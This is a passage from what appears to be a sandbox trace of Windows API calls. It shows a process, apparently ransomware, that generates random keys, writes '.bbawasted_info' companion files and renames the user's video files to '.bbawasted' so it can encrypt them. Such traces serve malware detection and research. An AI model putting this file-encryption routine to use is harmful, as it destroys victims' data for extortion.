HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\7XCQwS-MjphY97-F.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\7xcqws-mjphy97-f.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\7XCQwS-MjphY97-F.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\7xcqws-mjphy97-f.mkv.bbawasted")) returned 1 [0076.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\7XCQwS-MjphY97-F.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\7xcqws-mjphy97-f.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0076.748] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.750] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0076.751] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.751] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.751] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0076.752] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.752] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.811] SetEndOfFile (hFile=0x120) returned 1 [0076.813] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0076.813] CloseHandle (hObject=0x120) returned 1 [0076.816] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0076.816] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0076.817] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.817] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\EBWPMgz3.mp4") returned 74 [0076.818] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29e) returned 0x5d2990 [0076.818] lstrcpyW (in: lpString1=0x5d2a24, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.818] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0076.818] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0076.819] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0076.819] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\EBWPMgz3.mp4.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ebwpmgz3.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.819] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.821] SetEndOfFile (hFile=0x120) returned 1 [0076.821] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.821] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0076.821] lstrcpyW (in: lpString1=0x5d2a24, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\EBWPMgz3.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ebwpmgz3.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\EBWPMgz3.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ebwpmgz3.mp4.bbawasted")) returned 1 [0076.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\EBWPMgz3.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ebwpmgz3.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.822] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.824] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0076.825] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.825] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.825] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0076.826] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.826] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.837] SetEndOfFile (hFile=0x120) returned 1 [0076.840] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0076.840] CloseHandle (hObject=0x120) returned 1 [0076.895] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0076.895] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0076.896] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.896] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\lbwh0RtrXUin1pCd-.mp4") returned 83 [0076.897] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b0) returned 0x5bf070 [0076.897] lstrcpyW (in: lpString1=0x5bf116, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.897] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.897] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0076.898] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.898] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\lbwh0RtrXUin1pCd-.mp4.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\lbwh0rtrxuin1pcd-.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.913] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.914] SetEndOfFile (hFile=0x120) returned 1 [0076.914] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.915] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.915] lstrcpyW (in: lpString1=0x5bf116, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\lbwh0RtrXUin1pCd-.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\lbwh0rtrxuin1pcd-.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\lbwh0RtrXUin1pCd-.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\lbwh0rtrxuin1pcd-.mp4.bbawasted")) returned 1 [0076.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\lbwh0RtrXUin1pCd-.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\lbwh0rtrxuin1pcd-.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.916] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.919] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0076.919] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.919] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.919] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0076.920] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.920] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.929] SetEndOfFile (hFile=0x120) returned 1 [0076.931] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.931] CloseHandle (hObject=0x120) returned 1 [0076.932] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0076.932] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0076.933] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.933] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.933] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\m47I.flv") returned 70 [0076.933] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x296) returned 0x5d2990 [0076.933] lstrcpyW (in: lpString1=0x5d2a1c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.933] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.933] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0076.934] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.934] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\m47I.flv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\m47i.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.935] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.936] SetEndOfFile (hFile=0x120) returned 1 [0076.936] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.936] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.936] lstrcpyW (in: lpString1=0x5d2a1c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.936] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\m47I.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\m47i.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\m47I.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\m47i.flv.bbawasted")) returned 1 [0076.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\m47I.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\m47i.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.937] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.938] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0076.939] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.939] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.939] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0076.940] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.940] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.980] SetEndOfFile (hFile=0x120) returned 1 [0076.982] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.982] CloseHandle (hObject=0x120) returned 1 [0076.984] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0076.984] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5d0908) returned 1 [0076.984] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.984] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.984] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\q2U-1o.avi") returned 72 [0076.985] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29a) returned 0x5bf070 [0076.985] lstrcpyW (in: lpString1=0x5bf100, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.985] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.985] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5d0908) returned 1 [0076.985] CryptGenRandom (in: hProv=0x5d0908, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.985] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\q2U-1o.avi.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\q2u-1o.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.986] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.987] SetEndOfFile (hFile=0x120) returned 1 [0076.987] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.987] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.987] lstrcpyW (in: lpString1=0x5bf100, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\q2U-1o.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\q2u-1o.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\q2U-1o.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\q2u-1o.avi.bbawasted")) returned 1 [0076.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\q2U-1o.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\q2u-1o.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.988] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.989] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0076.990] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.990] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.990] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0076.990] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.990] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.999] SetEndOfFile (hFile=0x120) returned 1 [0077.001] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.001] CloseHandle (hObject=0x120) returned 1 [0077.002] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.002] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5d0908) returned 1 [0077.003] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.003] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.003] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\sCs0ljd4O6tF-7gqXjU.swf") returned 85 [0077.003] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b4) returned 0x5bf070 [0077.003] lstrcpyW (in: lpString1=0x5bf11a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.003] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.003] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5d0908) returned 1 [0077.004] CryptGenRandom (in: hProv=0x5d0908, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.004] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\sCs0ljd4O6tF-7gqXjU.swf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\scs0ljd4o6tf-7gqxju.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.005] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.006] SetEndOfFile (hFile=0x120) returned 1 [0077.006] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.006] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.006] lstrcpyW (in: lpString1=0x5bf11a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\sCs0ljd4O6tF-7gqXjU.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\scs0ljd4o6tf-7gqxju.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\sCs0ljd4O6tF-7gqXjU.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\scs0ljd4o6tf-7gqxju.swf.bbawasted")) returned 1 [0077.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\sCs0ljd4O6tF-7gqXjU.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\scs0ljd4o6tf-7gqxju.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.007] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0077.008] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0077.009] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0077.009] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.009] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0077.010] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.010] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.018] SetEndOfFile (hFile=0x120) returned 1 [0077.073] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.073] CloseHandle (hObject=0x120) returned 1 [0077.074] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) 